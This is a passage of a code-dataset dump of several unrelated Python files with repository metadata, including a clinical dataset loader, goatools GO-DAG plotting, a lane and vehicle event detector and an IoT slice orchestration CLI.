\"obv\"\r\n]","repo_name":"jeremyruss/Reinforcement-Learning-for-Algorithmic-Trading","sub_path":"finrl/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15524231184","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas import ExcelFile\nfrom OneHotEncoder import OneHotEncoder\n\nimport torch\nimport torch.nn as nn\n\nclass IOLDataset:\n def __init__(self, pandas_df, NaN = 999, verbose = False, max_length = 5):\n assert (type(pandas_df) == pd.core.frame.DataFrame), \"only accepts pandas DF objects\"\n self.df = pandas_df\n self.df.replace('NaN', NaN)\n self.patient_num = pandas_df.shape[0]\n self.verbose = verbose\n self.max_length = max_length\n\n '''\n Categorical vector encoding for metadata and outcome\n '''\n def one_hot_encoder(self, categorical_vector, encoded_dict={}):\n class_dict = encoded_dict\n class_index = 0\n index_list = []\n for i in range(len(categorical_vector)):\n if categorical_vector[i] not in class_dict:\n class_dict[categorical_vector[i]] = class_index\n class_index += 1\n index_list.append(class_dict[categorical_vector[i]])\n index_list = np.array(index_list)\n # change the column dimension of the one hot vector to be the same as the class dict\n one_hot_vector = np.zeros((index_list.size, len(class_dict)+1))\n one_hot_vector[np.arange(index_list.size),index_list] = 1\n return one_hot_vector, class_dict\n\n def set_metadata(self, metadata):\n encoded_matrix = []\n if self.verbose:\n print(\"Patient metadata includes: {}\".format(metadata))\n for column in metadata:\n one_hot_matrix, _ = self.one_hot_encoder(self.df[column].values, {})\n encoded_matrix = one_hot_matrix if len(encoded_matrix) == 0 else np.hstack((encoded_matrix, one_hot_matrix))\n if self.verbose:\n print(\"{} | key pair: {}\".format(column, _))\n self.metadata = encoded_matrix\n\n def set_outcome(self, outcome):\n encoded_matrix, _ = self.one_hot_encoder(self.df[outcome].values)\n if self.verbose:\n print(\"Outcome defined by: {}\".format(outcome))\n print(\"{} | key pair: {}\".format(outcome, _))\n self.outcome = encoded_matrix\n\n def set_delivery_time(self):\n self.delivery_time = self.df['Delivery Time'].values\n\n '''\n numpy datetime difference calculation is giving weird values. 
need to debug.\n '''\n def time_to_delivery(self, current_time):\n assert (type(current_time) == pd.core.series.Series), \"{} is not pandas series\".format(type(current_time))\n return np.array(self.delivery_time - current_time.values, dtype=int)\n\n '''\n Encoding action series\n '''\n def dict_encoder(self, categorical_vector, encoded_dict=None):\n # avoid a shared mutable default dict across calls\n class_dict = encoded_dict if encoded_dict is not None else {}\n class_index = 0\n for i in range(len(categorical_vector)):\n if categorical_vector[i] not in class_dict:\n class_dict[categorical_vector[i]] = class_index\n class_index += 1\n return class_dict\n\n def run_dict_encoder(self, actions_to_encode, max_length):\n self.encoded_dict = {}\n for item in actions_to_encode:\n encoded_dict = {}\n for t in range(1, max_length + 1):\n encoded_dict = self.dict_encoder(self.df[item + str(t)].values, encoded_dict)\n self.encoded_dict[item] = encoded_dict\n\n def set_induction_action(self, action_series):\n base = action_series[1:]\n self.induction_series = {}\n # iterate through all time points for each action base to create a dict with complete encodings\n self.run_dict_encoder(actions_to_encode = base, max_length = self.max_length)\n # iterate through time points to gather encodings and combine with time to delivery\n for t in range(1, self.max_length + 1):\n time_to_delivery = self.time_to_delivery(self.df[action_series[0] + str(t)])\n encoded_matrix = np.expand_dims(time_to_delivery, axis = 1) # make column vector\n for item in base:\n one_hot_matrix, _ = self.one_hot_encoder(self.df[item + str(t)].values, self.encoded_dict[item])\n encoded_matrix = np.hstack((encoded_matrix, one_hot_matrix))\n self.induction_series[t] = encoded_matrix\n if self.verbose:\n print(\"Induction actions include: {}\".format(base))\n print(\"Key pair: {}\".format(self.encoded_dict))\n\n '''\n Create dataset that rolls out the time points with one hot vector encodings and appropriate labels\n '''\n def create_dataset(self, bishop_included = True):\n self.set_metadata(['Age', 'Ethnicity category', 'Gravida', 'Parity']) # 'Current_Pregnancy_Concerns'\n self.set_outcome('Mode of Delivery')\n self.set_delivery_time()\n self.set_induction_action(['T', 'Indication', 'Action', 'PriorROM', 'Bishop'] if bishop_included else ['T', 'Indication', 'Action', 'PriorROM'])\n dataset = []\n for t in range(1, self.max_length + 1):\n action = self.induction_series[t][:,1:]\n time_to_delivery = self.induction_series[t][:,0]\n accumulated_action = action if t == 1 else accumulated_action + action\n # The above addition doesn't work because different induction time points have\n # different numbers of classes, but I didn't consider that when coding the one_hot_encodings...\n # need to debug. 
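One way to make the accumulation flagged above well-defined (an illustrative sketch, not the author's fix) is to zero-pad each time point's one-hot block to a shared width before summing:

    import numpy as np

    def pad_cols(mat, width):
        # right-pad a 2-D block with zero columns so blocks of different widths can be added
        out = np.zeros((mat.shape[0], width))
        out[:, :mat.shape[1]] = mat
        return out

    print(pad_cols(np.eye(2), 4).shape)  # (2, 4)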
FFS -woochan\n for patient_id in range(self.patient_num):\n dataset.append({'id':{'patient_id':patient_id, 'series':t},\n 'metadata':self.metadata[patient_id],\n 'action':accumulated_action[patient_id],\n 'time_to_delivery':time_to_delivery[patient_id],\n 'outcome':self.outcome[patient_id]})\n return dataset\n\n\n\nclass DataLoader:\n def __init__(self, dataset):\n self.dataset = dataset\n\n def __getitem__(self, index):\n return\n\n def __len__(self):\n return self.dataset_size\n","repo_name":"woochan-hwang/IOL_project","sub_path":"dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9336469978","text":"n, m = map(int, input().split())\narr = list(map(int, input().split()))\ncur = 0\nres = [i for i in range(1, n+1)]\ncount = 0\n\nfor i in arr:\n if len(res)==1:\n break\n tmp = res.index(i)\n if tmp >= cur:\n count += tmp - cur if tmp - cur < len(res) - tmp + cur else len(res) - tmp + cur\n else:\n count += cur - tmp if cur - tmp < len(res) - cur + tmp else len(res) - cur + tmp\n cur = tmp\n del res[cur]\n\nprint(count)","repo_name":"ChoiSangwon/algorithm","sub_path":"backjoon/1021.py","file_name":"1021.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15105866181","text":"\"\"\"This file is like a short engine.\nThe main purpose is to store all required functions, to prevent the app.py\nto be filled with spam \"\"\"\n\nimport math\nimport numpy as np\n\n\n\"\"\"------------------------------------------------------------\"\"\"\n\"\"\"-Everything that belongs taxa coloring or color generation.-\"\"\"\n\"\"\"------------------------------------------------------------\"\"\"\n\n\ndef rgbStrToVec(color):\n \"\"\" Converts a hex color code string into a numpy 3 vector.\n :param color: Color code string. An example would be \"#1A05FF\".\n :return: Returns a numpy 3 vector with red green and blue value.\n \"\"\"\n try:\n return np.array([int(\"0x\" + color[1:3], 16),\n int(\"0x\" + color[3:5], 16),\n int(\"0x\" + color[5:7], 16)])\n except ... as error:\n print(\"Error: required_functionalities->rgbStrToVec():\", error)\n return np.array([0, 0, 0])\n\n\ndef rgbVecToStr(c_vec):\n \"\"\" Converts a numpy 3 vector within int variables into a rbg hex color\n code string.\n :param c_vec: Numpy 3 vector within int variables between 0 and 255.\n :return: Returns a string with a hex color code.\n \"\"\"\n try:\n\n if c_vec[0] < 0: c_vec[0] = 0;\n if c_vec[0] > 255: c_vec[0] = 255;\n\n if c_vec[1] < 0: c_vec[1] = 0;\n if c_vec[1] > 255: c_vec[1] = 255;\n\n if c_vec[2] < 0: c_vec[2] = 0;\n if c_vec[2] > 255: c_vec[2] = 255;\n\n return \"#\" + str(hex(c_vec[0]))[2:4].zfill(2) + \\\n str(hex(c_vec[1]))[2:4].zfill(2) + \\\n str(hex(c_vec[2]))[2:4].zfill(2)\n except ... as error:\n print(\"Error: required_functionalities->rgbVecToStr()\", error)\n return \"#000000\"\n\n\ndef colorRampPalette(colors, n):\n \"\"\" Interpolate colors linearly to create a color palette.\n :param colors: List with color hex strings which is based on.\n :param n: Number of required colors. 
That effects the greatness\n of return list.\n :return: Gives a list with hex color strings.\n \"\"\"\n result = []\n c_len = len(colors)\n if c_len < 1:\n return []\n if c_len == 1:\n return colors * n\n if n == 1:\n return [colors[0]]\n\n step = (len(colors) - 1) / (n - 1)\n for i in range(0, n):\n if math.floor(step * i) == math.ceil(step * i):\n result.append(colors[math.floor(step * i)])\n else:\n v_color_a = rgbStrToVec(colors[math.floor(step * i)])\n v_color_b = rgbStrToVec(colors[math.ceil(step * i)])\n\n v_color = (v_color_a + (v_color_b - v_color_a) *\n (step * i % 1)).astype(int)\n result.append(rgbVecToStr(v_color))\n\n return result\n\n\ndef qualitativeColours(n, color_root=None):\n \"\"\" Generates a color palette in order to be able to differentiate between\n individual taxa as well as possible.\n :param n: Number of required colors.\n :param color_root a color hex string, which define the pole label color.\n :return: Gives a list with hex color strings.\n \"\"\"\n defauld_root = [\"#DF0101\", \"#FFFF00\", \"#298A08\", \"#00FF00\", \"#01DFD7\", \"#0101DF\", \"#F781BE\"]\n\n if color_root:\n try:\n color_root = color_root.split()\n\n # Simply data check, not valid against none hex letters.\n for i in color_root:\n if len(i) != 7 or i[0] != '#':\n print(\"Error: required_functionalities->qualitiveColours: \", \"ValueError: not a hex color string.\")\n color_root = defauld_root\n break\n\n except ... as e:\n print(\"Error: required_functionalities->qualitiveColours: \", e)\n color_root = defauld_root\n else:\n color_root = defauld_root\n\n return colorRampPalette(color_root, n)\n\n\ndef set_custom_color_traces(fig, custom_d_index):\n \"\"\" Manual update_traces() function for python dash figure,\n witch is simply write a custom variable into the marker color.\n This function is just a specific bug solution and only usable with\n Scatter3d traces.\n :param fig: Python dash scatter_3d figure witch should be updated.\n :param custom_d_index: Index of custom variable in the corresponding trace.\n Effects something like %customdata[i].\n :return: All updates are by reference, hence it returns void.\n \"\"\"\n for trace in fig.data:\n try:\n trace['marker']['color'] = trace['customdata'][0][custom_d_index]\n except ... 
as error:\n print(\"Error: required_functionalities->updateColorTraces:\", error)\n\n\n","repo_name":"lukekoch/taXaminer-dashboard-g-nom","sub_path":"utility/required_functionalities.py","file_name":"required_functionalities.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43605375218","text":"import os\n\nimport pytest\nfrom mock import Mock, patch\n\nfrom sigopt.orchestrate.sigopt.service import SigOptService\n\n\nclass TestSigOptService(object):\n @pytest.fixture\n def services(self):\n return Mock()\n\n def test_reads_from_environment(self, services):\n with patch.dict(\n os.environ,\n dict(SIGOPT_API_TOKEN=\"foobar\", SIGOPT_API_URL=\"https://api-env.sigopt.com\"),\n ):\n sigopt_service = SigOptService(services)\n assert sigopt_service.conn is not None\n assert sigopt_service.api_token == \"foobar\"\n assert sigopt_service.api_url == \"https://api-env.sigopt.com\"\n","repo_name":"sigopt/sigopt-python","sub_path":"test/orchestrate/sigopt/service_test.py","file_name":"service_test.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"68"} +{"seq_id":"17839600321","text":"\"\"\"Plot a GODagSmall.\"\"\"\n\n__copyright__ = \"Copyright (C) 2016-2018, DV Klopfenstein, H Tang, All rights reserved.\"\n__author__ = \"DV Klopfenstein\"\n\nimport sys\nimport os\nimport collections as cx\nfrom collections import OrderedDict\nfrom goatools.godag_obosm import OboToGoDagSmall\n\ndef plot_gos(fout_png, goids, obo_dag, *args, **kws):\n \"\"\"Given GO ids and the obo_dag, create a plot of paths from GO ids.\"\"\"\n engine = kws['engine'] if 'engine' in kws else 'pydot'\n godagsmall = OboToGoDagSmall(goids=goids, obodag=obo_dag).godag\n godagplot = GODagSmallPlot(godagsmall, *args, **kws)\n godagplot.plt(fout_png, engine)\n\ndef plot_goid2goobj(fout_png, goid2goobj, *args, **kws):\n \"\"\"Given a dict containing GO id and its goobj, create a plot of paths from GO ids.\"\"\"\n engine = kws['engine'] if 'engine' in kws else 'pydot'\n godagsmall = OboToGoDagSmall(goid2goobj=goid2goobj).godag\n godagplot = GODagSmallPlot(godagsmall, *args, **kws)\n godagplot.plt(fout_png, engine)\n\ndef plot_results(fout_png, goea_results, *args, **kws):\n \"\"\"Given a list of GOEA results, plot result GOs up to top.\"\"\"\n if \"{NS}\" not in fout_png:\n plt_goea_results(fout_png, goea_results, *args, **kws)\n else:\n # Plot separately by NS: BP, MF, CC\n ns2goea_results = cx.defaultdict(list)\n for rec in goea_results:\n ns2goea_results[rec.NS].append(rec)\n for ns_name, ns_res in ns2goea_results.items():\n png = fout_png.format(NS=ns_name)\n plt_goea_results(png, ns_res, *args, **kws)\n\ndef plt_goea_results(fout_png, goea_results, *args, **kws):\n \"\"\"Plot a single page.\"\"\"\n engine = kws['engine'] if 'engine' in kws else 'pydot'\n godagsmall = OboToGoDagSmall(goea_results=goea_results).godag\n godagplot = GODagSmallPlot(godagsmall, *args, goea_results=goea_results, **kws)\n godagplot.plt(fout_png, engine)\n\nclass GODagPltVars(object):\n \"\"\"Holds plotting paramters.\"\"\"\n\n # http://www.graphviz.org/doc/info/colors.html\n rel2col = {\n 'is_a': 'black',\n 'part_of': 'blue',\n 'regulates': 'gold',\n 'positively_regulates': 'green',\n 'negatively_regulates': 'red',\n 'occurs_in': 'aquamarine4',\n 'capable_of': 'dodgerblue',\n 'capable_of_part_of': 'darkorange',\n }\n\n alpha2col = OrderedDict([\n # GOEA GO terms that are 
significant\n (0.005, 'mistyrose'),\n (0.010, 'moccasin'),\n (0.050, 'lemonchiffon1'),\n # GOEA GO terms that are not significant\n (1.000, 'grey95'),\n ])\n\n key2col = {\n 'level_01': 'lightcyan',\n 'go_sources': 'palegreen',\n }\n\n fmthdr = \"{GO} L{level:>02} D{depth:>02}\"\n fmtres = \"{study_count} genes\"\n # study items per line on GO Terms:\n items_p_line = 5\n\n\nclass GODagSmallPlot(object):\n \"\"\"Plot a graph contained in an object of type GODagSmall .\"\"\"\n\n def __init__(self, godagsmall, *args, **kws):\n self.args = args\n self.log = kws['log'] if 'log' in kws else sys.stdout\n self.title = kws['title'] if 'title' in kws else None\n # GOATOOLs results as objects\n self.go2res = self._init_go2res(**kws)\n # GOATOOLs results as a list of namedtuples\n self.pval_name = self._init_pval_name(**kws)\n # Gene Symbol names\n self.id2symbol = kws['id2symbol'] if 'id2symbol' in kws else {}\n self.study_items = kws['study_items'] if 'study_items' in kws else None\n self.study_items_max = self._init_study_items_max()\n self.alpha_str = kws['alpha_str'] if 'alpha_str' in kws else None\n self.pltvars = kws['GODagPltVars'] if 'GODagPltVars' in kws else GODagPltVars()\n if 'items_p_line' in kws:\n self.pltvars.items_p_line = kws['items_p_line']\n self.dpi = kws['dpi'] if 'dpi' in kws else 150\n self.godag = godagsmall\n self.goid2color = self._init_goid2color()\n self.pydot = None\n\n def _init_study_items_max(self):\n \"\"\"User can limit the number of genes printed in a GO term.\"\"\"\n if self.study_items is None:\n return None\n if self.study_items is True:\n return None\n if isinstance(self.study_items, int):\n return self.study_items\n return None\n\n @staticmethod\n def _init_go2res(**kws):\n \"\"\"Initialize GOEA results.\"\"\"\n if 'goea_results' in kws:\n return {res.GO:res for res in kws['goea_results']}\n if 'go2nt' in kws:\n return kws['go2nt']\n\n @staticmethod\n def _init_pval_name(**kws):\n \"\"\"Initialize pvalue attribute name.\"\"\"\n if 'pval_name' in kws:\n return kws['pval_name']\n if 'goea_results' in kws:\n goea = kws['goea_results']\n if goea:\n return \"p_{M}\".format(M=goea[0].method_flds[0].fieldname)\n\n def _init_goid2color(self):\n \"\"\"Set colors of GO terms.\"\"\"\n goid2color = {}\n # 1. colors based on p-value override colors based on source GO\n if self.go2res is not None:\n alpha2col = self.pltvars.alpha2col\n pval_name = self.pval_name\n for goid, res in self.go2res.items():\n pval = getattr(res, pval_name, None)\n if pval is not None:\n for alpha, color in alpha2col.items():\n if pval <= alpha and res.study_count != 0:\n if goid not in goid2color:\n goid2color[goid] = color\n # 2. GO source color\n color = self.pltvars.key2col['go_sources']\n for goid in self.godag.go_sources:\n if goid not in goid2color:\n goid2color[goid] = color\n # 3. 
Level-01 GO color\n color = self.pltvars.key2col['level_01']\n for goid, goobj in self.godag.go2obj.items():\n if goobj.level == 1:\n if goid not in goid2color:\n goid2color[goid] = color\n return goid2color\n\n def plt(self, fout_img, engine=\"pydot\"):\n \"\"\"Plot using pydot, graphviz, or GML.\"\"\"\n if engine == \"pydot\":\n self._plt_pydot(fout_img)\n elif engine == \"pygraphviz\":\n raise Exception(\"TO BE IMPLEMENTED SOON: ENGINE pygraphviz\")\n else:\n raise Exception(\"UNKNOWN ENGINE({E})\".format(E=engine))\n\n # ----------------------------------------------------------------------------------\n # pydot\n def _plt_pydot(self, fout_img):\n \"\"\"Plot using the pydot graphics engine.\"\"\"\n dag = self._get_pydot_graph()\n img_fmt = os.path.splitext(fout_img)[1][1:]\n dag.write(fout_img, format=img_fmt)\n self.log.write(\" {GO_USR:>3} usr {GO_ALL:>3} GOs WROTE: {F}\\n\".format(\n F=fout_img,\n GO_USR=len(self.godag.go_sources),\n GO_ALL=len(self.godag.go2obj)))\n\n def _get_pydot_graph(self):\n \"\"\"Given a DAG, return a pydot digraph object.\"\"\"\n rel = \"is_a\"\n pydot = self._get_pydot()\n # Initialize empty dag\n dag = pydot.Dot(label=self.title, graph_type='digraph', dpi=\"{}\".format(self.dpi))\n # Initialize nodes\n go2node = self._get_go2pydotnode()\n # Add nodes to graph\n for node in go2node.values():\n dag.add_node(node)\n # Add edges to graph\n rel2col = self.pltvars.rel2col\n for src, tgt in self.godag.get_edges():\n dag.add_edge(pydot.Edge(\n go2node[tgt], go2node[src],\n shape=\"normal\",\n color=rel2col[rel],\n dir=\"back\")) # invert arrow direction for obo dag convention\n return dag\n\n def _get_go2pydotnode(self):\n \"\"\"Create pydot Nodes.\"\"\"\n go2node = {}\n for goid, goobj in self.godag.go2obj.items():\n txt = self._get_node_text(goid, goobj)\n fillcolor = self.goid2color.get(goid, \"white\")\n node = self.pydot.Node(\n txt,\n shape=\"box\",\n style=\"rounded, filled\",\n fillcolor=fillcolor,\n color=\"mediumseagreen\")\n go2node[goid] = node\n return go2node\n\n def _get_pydot(self):\n \"\"\"Return pydot package. Load pydot, if necessary.\"\"\"\n if self.pydot:\n return self.pydot\n self.pydot = __import__(\"pydot\")\n return self.pydot\n\n # ----------------------------------------------------------------------------------\n # Methods for text printed inside GO terms\n def _get_node_text(self, goid, goobj):\n \"\"\"Return a string to be printed in a GO term box.\"\"\"\n txt = []\n # Header line: \"GO:0036464 L04 D06\"\n txt.append(self.pltvars.fmthdr.format(\n GO=goobj.id.replace(\"GO:\", \"GO\"),\n level=goobj.level,\n depth=goobj.depth))\n # GO name line: \"cytoplasmic ribonucleoprotein\"\n name = goobj.name.replace(\",\", \"\\n\")\n txt.append(name)\n # study info line: \"24 genes\"\n study_txt = self._get_study_txt(goid)\n if study_txt is not None:\n txt.append(study_txt)\n # return text string\n return \"\\n\".join(txt)\n\n def _get_study_txt(self, goid):\n \"\"\"Get GO text from GOEA study.\"\"\"\n if self.go2res is not None:\n res = self.go2res.get(goid, None)\n if res is not None:\n if self.study_items is not None:\n return self._get_item_str(res)\n else:\n return self.pltvars.fmtres.format(\n study_count=res.study_count)\n\n def _get_item_str(self, res):\n \"\"\"Return genes in any of these formats:\n 1. 19264, 17319, 12520, 12043, 74131, 22163, 12575\n 2. Ptprc, Mif, Cd81, Bcl2, Sash3, Tnfrsf4, Cdkn1a\n 3. 
7: Ptprc, Mif, Cd81, Bcl2, Sash3...\n \"\"\"\n npl = self.pltvars.items_p_line # Number of items Per Line\n prt_items = sorted([self.__get_genestr(itemid) for itemid in res.study_items])\n prt_multiline = [prt_items[i:i+npl] for i in range(0, len(prt_items), npl)]\n num_items = len(prt_items)\n if self.study_items_max is None:\n genestr = \"\\n\".join([\", \".join(str(e) for e in sublist) for sublist in prt_multiline])\n return \"{N}) {GENES}\".format(N=num_items, GENES=genestr)\n else:\n if num_items <= self.study_items_max:\n strs = [\", \".join(str(e) for e in sublist) for sublist in prt_multiline]\n genestr = \"\\n\".join(strs)\n return genestr\n else:\n short_list = prt_items[:self.study_items_max]\n short_mult = [short_list[i:i+npl] for i in range(0, len(short_list), npl)]\n short_str = \"\\n\".join([\", \".join(str(e) for e in sublist) for sublist in short_mult])\n return \"\".join([\"{N} genes; \".format(N=num_items), short_str, \"...\"])\n\n def __get_genestr(self, itemid):\n \"\"\"Given a geneid, return the string geneid or a gene symbol.\"\"\"\n if self.id2symbol is not None:\n symbol = self.id2symbol.get(itemid, None)\n if symbol is not None:\n return symbol\n if isinstance(itemid, int):\n return str(itemid)\n return itemid\n\n# Copyright (C) 2016-2018, DV Klopfenstein, H Tang, All rights reserved.\n","repo_name":"tanghaibao/goatools","sub_path":"goatools/godag_plot.py","file_name":"godag_plot.py","file_ext":"py","file_size_in_byte":11480,"program_lang":"python","lang":"en","doc_type":"code","stars":671,"dataset":"github-code","pt":"68"} +{"seq_id":"29807087398","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport glob\nimport os, signal, queue\n\nfrom lanenetdet.config import global_config\nfrom lanenetdet.lanenet_model import lanenet\n\nfrom run_efficientdet import effdet\n\nfrom module.functions import *\nfrom module.object_Tracker import Object_Tracker\nfrom module.line_Tracker import LineTracker\nfrom module.event_Classifier import EventClassifier\n\nclass Event_Detector:\n\n def __init__(self):\n # setup Tracker objects\n self.ot = Object_Tracker()\n self.lt = LineTracker()\n self.ec = EventClassifier(object_Tracker=self.ot, line_Tracker=self.lt)\n self.gpath = \"C:/FusionData/5A/ClassEvent_IHM\"\n\n def detect_events(self, action_interface, stop_process_queue, videoFolderPath, flag_crossing, flag_acc, flag_cico, flag_cut):\n # Set sess configuration / init lanenet\n sess_config = tf.ConfigProto()\n CFG = global_config.cfg\n sess_config.gpu_options.per_process_gpu_memory_fraction = CFG.TEST.GPU_MEMORY_FRACTION\n sess_config.gpu_options.allow_growth = CFG.TRAIN.TF_ALLOW_GROWTH\n sess_config.gpu_options.allocator_type = 'BFC'\n\n sess = tf.Session(config=sess_config)\n lane_frame_width = 720 # lanenet input size\n lane_frame_height = 256 # lanenet input size\n\n with sess.as_default():\n input_tensor = tf.placeholder(dtype=tf.float32, shape=[1, lane_frame_height, lane_frame_width, 3], name='input_tensor')\n net = lanenet.LaneNet(phase='test', net_flag='vgg')\n binary_seg_ret, instance_seg_ret = net.inference(input_tensor=input_tensor, name='lanenet_model')\n saver = tf.train.Saver()\n saver.restore(sess=sess, save_path= self.gpath + \"/lanenetdet/model/tusimple_lanenet_vgg.ckpt\") # C:/Tools/Python37/Lib/lanenetdet/model/tusimple_lanenet_vgg.ckpt\n\n # init efficientdet\n efficient_det = effdet(self.gpath)\n vid_folders = glob.glob(videoFolderPath + \"/*\")\n for vid in vid_folders:\n vidname = 
vid.split(\"\\\\\")[-1]\n print(\"Processing file : \" + vidname)\n vidonlyname = vidname.split(\".\")[0]\n cap = cv2.VideoCapture(vid)\n self.fps = cap.get(cv2.CAP_PROP_FPS) # raw is 25 fps\n total_frame = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n frame_width = 720 # after maskframe\n frame_height = 255 # after maskframe\n frame_count = 0\n while (cap.isOpened()):\n ret, frame = cap.read()\n if ret == True:\n rects = list()\n frame_count += 1\n frame = maskframe(frame) # raw image is 720x576, output is 720x350\n # efficientdet\n if (frame_count-1) % 2 == 0 or frame_count == 1:\n action_interface.affichage(frame_count, total_frame)\n detections = efficient_det.detect_image(frame) # ymin, xmin, ymax, xmax frame[80:, 150:550]\n for detect in detections:\n if detect[6] in [3, 4, 6, 8]: # car, motorcycle, bus, truck\n rects.append(detect) # (?, ymin, xmin, ymax, xmax, %, class)\n # Object Tracking \n objects = self.ot.update(rects, self.lt.lines)\n if len(objects) > 0:\n new_frame = efficient_det.draw_objects(frame, np.array(list(objects.values())), track_ids=list(objects.keys()))\n else: \n new_frame = frame\n\n # lanenet \n frame = cv2.resize(frame, (lane_frame_width, lane_frame_height), interpolation=cv2.INTER_LINEAR)\n frame = frame / 127.5 - 1.0\n with sess.as_default():\n binary_seg_image, instance_seg_image = sess.run(\n [binary_seg_ret, instance_seg_ret],\n feed_dict={input_tensor: [frame]}\n )\n if binary_seg_image is not None:\n # Compute lines for each step\n output, right_lane, left_lane = self.lt.update(binary_seg_image[0], new_frame)\n self.ec.update(vidonlyname, frame_count, flag_acc, flag_cico, flag_crossing, flag_cut)\n # Frames are polled with a 1 ms delay (cv2.waitKey(1)); the program breaks out of the while loop when the user presses the 'q' key\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n try:\n stop_process = stop_process_queue.get(timeout=1)\n if stop_process:\n sess.close()\n action_interface.register_Event(self.ec.hist_event)\n print(\"=== FIN de l'analyse vidéo ===\")\n return\n except queue.Empty:\n pass\n else:\n break\n # The following frees up resources and closes all windows\n cap.release()\n print(\"FIN DE LA LECTURE VIDEO\")\n action_interface.register_Event(self.ec.hist_event)\n sess.close()","repo_name":"MrzAtn/FDD","sub_path":"event_detector.py","file_name":"event_detector.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15549977178","text":"\"\"\"\niotorch iotslice\n\n Usage:\n iotorch iotslice create --name=<name> --edge=<edge> --cloud=<cloud> [--configfile=<configfile>] \n iotorch iotslice [get|delete] --name=<name> [--configfile=<configfile>]\n iotorch iotslice list [--configfile=<configfile>]\n\n\"\"\"\nfrom json import dumps\n\nfrom .base import Base\n\nfrom docopt import docopt\n\nfrom ..utils import k8sutils\n\nimport toml\n\nimport os\n\nclass Iotslice(Base):\n \"\"\"The IoT Slice command.\"\"\"\n\n def create(self):\n\n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n iotslicename = self.options['--name']\n edgeclustername = self.options['--edge']\n cloudclustername = self.options['--cloud']\n\n sliceparams = {'edge':edgeclustername,'cloud':cloudclustername}\n\n iotslice = {iotslicename:sliceparams}\n\n config = {}\n\n iotslices = iotslice\n\n if not os.path.exists(config_path):\n print('Clusters do not exist')\n return\n\n with open(config_path,'r') as f:\n config = toml.load(f)\n if config.get('iotslices') != None:\n iotslices = 
config['iotslices']\n iotslices.update(iotslice)\n\n clusters = config.get('k8sclusters')\n \n if clusters == None:\n print('Clusters do not exist')\n return\n\n edge = clusters.get(edgeclustername)\n\n if edge == None:\n print('Edge cluster does not exist')\n return\n\n cloud = clusters.get(cloudclustername)\n\n if cloud == None:\n print('Cloud cluster does not exist')\n return\n\n if not k8sutils.createnamespace(iotslicename,edgeclustername,config_path):\n print('Iot Slice not created in Edge Cluster')\n return\n\n if edgeclustername != cloudclustername:\n if not k8sutils.createnamespace(iotslicename,cloudclustername,config_path):\n print('Iot Slice not created in Cloud Cluster')\n return\n\n config.update({'iotslices':iotslices})\n with open(config_path,'w+') as f:\n toml.dump(config,f)\n\n print('IoT Slice %s created' %iotslicename)\n\n def delete(self):\n\n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n if not os.path.exists(config_path):\n print('Nothing to delete')\n return\n\n iotslicename = self.options['--name']\n\n config = {}\n with open(config_path,'r') as f:\n config = toml.load(f)\n\n if config.get('iotslices') == None:\n print('Nothing to delete')\n return\n\n iotslices = config.pop('iotslices')\n\n if iotslices.get(iotslicename) == None:\n print('Nothing to delete')\n return\n\n iotslice = iotslices.pop(iotslicename)\n\n edgeclustername = iotslice.get('edge')\n cloudclustername = iotslice.get('cloud')\n\n if not k8sutils.deletenamespace(iotslicename,edgeclustername,config_path):\n print('Iot Slice not deleted in Edge Cluster')\n return\n\n if edgeclustername != cloudclustername:\n if not k8sutils.deletenamespace(iotslicename,cloudclustername,config_path):\n print('Iot Slice not deleted in Cloud Cluster')\n return\n\n config.update({'iotslices':iotslices})\n\n with open(config_path,'w+') as f:\n toml.dump(config,f)\n\n print('IoT Slice %s deleted' %iotslicename)\n\n def get(self):\n \n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n if not os.path.exists(config_path):\n print('Nothing to get')\n else:\n with open(config_path) as f:\n config = toml.load(f)\n slices = config.get('iotslices')\n if slices == None:\n print('Nothing to get')\n return\n iotslice = slices.get(self.options['--name'])\n if iotslice == None:\n print('Nothing to get')\n else:\n print(iotslice)\n\n def list(self):\n\n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n if not os.path.exists(config_path):\n print('Nothing to list')\n else:\n with open(config_path) as f:\n config = toml.load(f)\n slices = config.get('iotslices')\n if slices == None:\n print('Nothing to list')\n else:\n print (list(slices.keys()))\n\n\n def run(self):\n\n options = docopt(__doc__)\n\n if options['create']:\n self.options=options\n self.create()\n elif options['delete']:\n self.options=options\n self.delete()\n elif options['get']:\n self.options=options\n self.get()\n elif options['list']:\n self.options=options\n self.list()\n else:\n print(\"Option not implemented\")\n raise NotImplementedError('Option not implemented')\n","repo_name":"juanmagal/iot-slice-orchestrator","sub_path":"iotorch/commands/iotslice.py","file_name":"iotslice.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"71123378457","text":"from inspect import signature\r\n\r\nimport 
